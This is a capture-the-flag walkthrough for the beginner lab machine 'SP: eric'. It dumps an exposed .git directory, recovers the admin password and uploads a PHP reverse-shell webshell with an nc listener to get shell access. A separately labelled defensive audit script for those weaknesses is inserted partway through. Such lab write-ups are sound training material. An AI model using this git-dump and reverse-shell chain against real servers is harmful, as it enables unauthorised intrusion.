CTF: SP: eric Walkthrough


Hello dear friends, welcome back for another CTF walkthrough. Today we will solve the SP: eric machine.

Description

Eric is trying to reach out on the Internet, but is he following best practice?

Flags – /root/flag.txt – /home/eric/flag.txt

Tested with VirtualBox

DHCP enabled

Difficulty: Beginner

Should not be as easy as to just run a MSF module to get root right away, if so please let me know.

Doesn’t always get an IP address nicely with DHCP.

Information gathering

TCP Scanning

Dirb

GitTools

After testing the admin page, I understood that .git was the right way to get some juicy info.

For our purpose, we are going to use GitTools:

  • git clone https://github.com/internetwache/GitTools
  • cd GitTools
  • chmod +x gitdumper.sh
  • ./gitdumper.sh http://192.168.1.152/.git/ dest-dir

  • ./extractor.sh dest-dir/ dest-dir/

  • cd 2-3db5628b550f5c9c9f6f663cd158374035a6eaa0/
  • examine the admin.php file and bingo, we found the password

  • USERNAME: admin
  • PASSWORD: st@mpch0rdt.ightiRu$glo0mappL3

Upload webshell

After logging in, we can upload a webshell

  • copy a web shell into the local directory: cp /usr/share/webshells/php/php-reverse-shell.php .
  • modify the IP
  • nc -nlvp 443
  • upload the file
  • 192.168.1.152/upload/php-reverse-shell.php
  • Bingo, we have a reverse shell
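
A defender-side check for the three weaknesses the GitTools and upload steps above rely on (a `.git` directory in the web root, a password committed in PHP source, and a script accepted into `upload/`), as an added example that is not part of the original post. The function names, finding labels, extension list and the constructed sample tree are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not from the original walkthrough. Finding labels, extension
# list and the sample tree are assumptions chosen for illustration.

# Literal string assigned to a password-like PHP variable, e.g. $pass = "...";
SECRET_RE="\\\$[A-Za-z_]*(pass|pwd)[A-Za-z_]*[[:space:]]*=[[:space:]]*[\"'][^\"']+"

# Print one finding per line; return 1 if anything was found, 0 if clean.
audit_webroot() {
    root=$1
    # 1. Git metadata served from the document root (history is downloadable).
    vcs=$(find "$root" -type d -name .git -prune | sed 's/^/VCS_METADATA /')
    # 2. Credentials committed in PHP source (recoverable once .git leaks).
    secrets=$(find "$root" -name .git -prune -o -type f -name '*.php' \
                  -exec grep -liE "$SECRET_RE" {} + | sed 's/^/HARDCODED_SECRET /')
    # 3. Server-executable scripts sitting in an upload directory.
    scripts=$(find "$root" -type f \( -path '*/upload/*' -o -path '*/uploads/*' \) \
                  \( -iname '*.php' -o -iname '*.phtml' -o -iname '*.phar' \) |
              sed 's/^/SCRIPT_IN_UPLOAD_DIR /')
    report=$(printf '%s\n%s\n%s\n' "$vcs" "$secrets" "$scripts" | sed '/^$/d')
    [ -z "$report" ] && return 0
    printf '%s\n' "$report"
    return 1
}

# Build a constructed sample tree (same layout as this machine) and print its path.
make_sample_webroot() {
    dir=$(mktemp -d)
    mkdir -p "$dir/.git" "$dir/upload"
    printf '<?php $pass = "constructed-sample-value";\n' > "$dir/admin.php"
    printf '<?php /* constructed placeholder */\n' > "$dir/upload/php-reverse-shell.php"
    printf 'plain text\n' > "$dir/upload/readme.txt"
    printf '%s\n' "$dir"
}

sample=$(make_sample_webroot)
audit_webroot "$sample" || echo "-> findings above need fixing before deployment"
rm -rf "$sample"
```

Run it against the deployed document root rather than a developer checkout, since the question is what the web server can actually serve.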

Flag 1

  • cd /home/eric
  • cat flag.txt

Flag 2

  • nano backup.sh
  • cat /root/flag.txt

Fantastic, we have completed the eric machine.